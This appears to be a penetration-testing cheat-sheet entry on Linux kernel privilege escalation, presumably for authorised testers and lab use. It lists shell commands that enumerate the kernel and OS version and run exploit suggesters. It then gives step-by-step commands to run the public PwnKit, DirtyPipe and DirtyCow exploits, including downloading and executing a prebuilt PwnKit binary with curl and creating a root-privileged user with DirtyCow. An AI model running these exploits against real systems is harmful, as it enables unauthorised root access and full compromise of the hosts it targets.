• Privilege Escalation
• Linux
• Shell
• Kernel Exploit

Escalate privileges via Linux kernel exploits. Enumerate kernel and OS version to identify matching exploits like PwnKit, DirtyPipe, and DirtyCow.

Shell

• # ============================================================
  # ENUMERATION — Kernel and OS version
  # ============================================================
  
  # Get kernel version (full and short)
  uname -a
  uname -r
  
  # Get OS release information
  cat /etc/*-release
  cat /etc/os-release
  cat /etc/issue
  
  # Check architecture
  arch
  dpkg --print-architecture 2>/dev/null
  
  # ============================================================
  # AUTOMATED EXPLOIT SUGGESTION
  # ============================================================
  
  # linux-exploit-suggester (run on target)
  # https://github.com/The-Z-Labs/linux-exploit-suggester
  ./linux-exploit-suggester.sh
  
  # Or searchsploit (on attacker)
  searchsploit linux kernel $(uname -r | cut -d'-' -f1)
  
  # ============================================================
  # PwnKit (CVE-2021-4034)
  # ============================================================
  # Works on most Ubuntu/Debian/CentOS with polkit installed
  # Try this FIRST on any Ubuntu target
  # https://github.com/ly4k/PwnKit
  curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
  chmod +x PwnKit
  ./PwnKit
  
  # ============================================================
  # DirtyPipe (CVE-2022-0847) — kernel 5.8 to 5.16.11
  # ============================================================
  # https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits
  gcc -o dirtypipe exploit.c
  ./dirtypipe /usr/bin/su
  
  # ============================================================
  # DirtyCow (CVE-2016-5195) — kernel 2.6.22 to 4.8.3
  # ============================================================
  # https://github.com/firefart/dirtycow
  gcc -pthread dirty.c -o dirty -lcrypt
  ./dirty P@ssw0rd
  # Creates user "firefart" with root privileges
  su firefart
  
  # ============================================================
  # NOTES
  # ============================================================
  # - On Ubuntu, always try PwnKit first
  # - Search Google for "kernel <version> privilege escalation"
  # - Check searchsploit for matching exploits
  # - Compile exploits on a similar OS/arch to avoid library issues
  # - Transfer compiled binary to target for execution
  

References:

https://github.com/The-Z-Labs/linux-exploit-suggester

https://github.com/ly4k/PwnKit